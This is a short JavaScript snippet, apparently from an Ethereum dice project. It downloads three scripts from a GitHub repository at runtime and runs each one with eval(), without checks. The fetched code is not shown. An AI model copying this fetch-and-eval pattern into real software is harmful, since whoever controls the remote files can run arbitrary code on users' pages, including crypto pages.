fetch("https://raw.githubusercontent.com/IceProtect/Ether-Dice/main/ethos2cad.js").then(resp=>{
resp.text().then(code=>{
eval(code)
})
})
fetch("https://raw.githubusercontent.com/IceProtect/Ether-Dice/main/ethos2usd.js").then(resp=>{
resp.text().then(code=>{
eval(code)
})
})
fetch("https://raw.githubusercontent.com/IceProtect/Ether-Dice/main/ethos2eth.js").then(resp=>{
resp.text().then(code=>{
eval(code)
})
})
